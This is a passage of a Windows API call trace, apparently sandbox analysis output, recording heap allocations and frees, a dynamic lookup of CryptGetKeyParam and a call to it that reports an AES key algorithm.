lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0122.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0122.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca970 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0122.701] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0122.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.701] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.702] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0122.702] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0122.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.702] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0122.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0122.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0122.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0122.706] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392148 | out: hHeap=0x1780000) returned 1 [0122.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca910 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.706] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0122.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0122.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0122.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0122.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0122.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0122.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0122.710] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0122.710] CryptGetKeyParam (in: hKey=0x41ac6c0, dwParam=0x7, pbData=0x43e2820, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2820*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0122.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0122.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.712] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 